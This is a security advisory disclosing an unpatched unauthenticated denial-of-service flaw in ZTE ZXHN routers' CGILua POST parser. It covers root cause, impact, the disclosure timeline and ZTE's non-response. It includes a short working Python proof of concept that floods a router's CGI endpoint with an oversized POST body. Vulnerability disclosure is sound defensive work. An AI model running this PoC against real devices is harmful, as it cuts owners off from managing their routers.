📄 ZTE ZXHN Router Denial of Service

-----BEGIN SECURITY ADVISORY-----
    
    Advisory ID:    MONX-2026-001
    CVE ID:         CVE-2026-34473
    Title:          Unauthenticated Denial of Service via Oversized POST Body
    in ZTE Router CGILua Parser
    Affected:       17+ ZTE ZXHN router models (~140,000 publicly exposed
    devices)
    CVSS Score:     7.5 (AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)
    Date:           2026-05-20
    Author:         Mina Nageh Salalma (Monx Research)
    Contact:        [email protected]
    Public URL:
    https://github.com/minanagehsalalma/cve-2026-34473-unauthenticated-dos-zte-routers
    MITRE:          https://www.cve.org/CVERecord?id=CVE-2026-34473
    
    
    AFFECTED PRODUCTS
    -----------------
    17+ ZTE ZXHN router models sharing the CGILua firmware stack.
    Estimated 140,000+ devices publicly reachable on the Internet at time of
    research.
    
    
    VULNERABILITY DESCRIPTION
    --------------------------
    The CGILua post.lua parser used in ZTE ZXHN routers does not enforce an
    upper
    bound on the body size of application/x-www-form-urlencoded POST requests.
    An unauthenticated attacker can crash or freeze the router's web management
    service by sending a single HTTP POST request with an oversized body to any
    CGI endpoint. No authentication, session cookie, or prior access is
    required.
    
    
    ROOT CAUSE
    ----------
    Firmware analysis of extracted squashfs images confirms that post.lua reads
    the entire POST body into memory before parsing. There is no Content-Length
    check or body-size limiter before the allocation occurs. Oversized payloads
    cause the LuCI/CGILua process to exhaust memory or fault, taking down the
    web management interface until the device is power-cycled.
    
    
    PROOF OF CONCEPT
    ----------------
      import requests
      url = "http://TARGET_IP/cgi-bin/luci"
      payload = "a=" + "A" * (256 * 1024)  # 256 KB
      headers = {"Content-Type": "application/x-www-form-urlencoded"}
      try:
          r = requests.post(url, data=payload, headers=headers, timeout=15)
          print(f"HTTP {r.status_code}")
      except requests.exceptions.Timeout:
          print("Timeout - DoS successful")
      except requests.exceptions.ConnectionError:
          print("Connection dropped - DoS successful")
    
    
    IMPACT
    ------
    An unauthenticated attacker on the LAN or WAN (if management interface is
    publicly exposed, as is the case for ~140,000 devices) can permanently
    disable remote management access, forcing a physical reboot to restore
    access.
    ISP-deployed devices with no physical access for end users are especially
    vulnerable.
    
    
    TIMELINE
    --------
    2024-05:   Local validation on hardware. Firmware extraction and root-cause
    confirmed.
    2024-05:   Report sent to ZTE PSIRT.
    2025-01:   Escalated to MITRE after ZTE failed to respond.
    2026-03:   MITRE assigned CVE-2026-34473.
    2026-05-20: Full public disclosure.
    
    
    VENDOR RESPONSE
    ---------------
    ZTE PSIRT did not respond to the initial report. MITRE assigned the CVE
    directly. No patch has been issued.
    
    
    CREDITS
    -------
    Mina Nageh Salalma (Monx Research)
    https://github.com/minanagehsalalma
    
    -----END SECURITY ADVISORY-----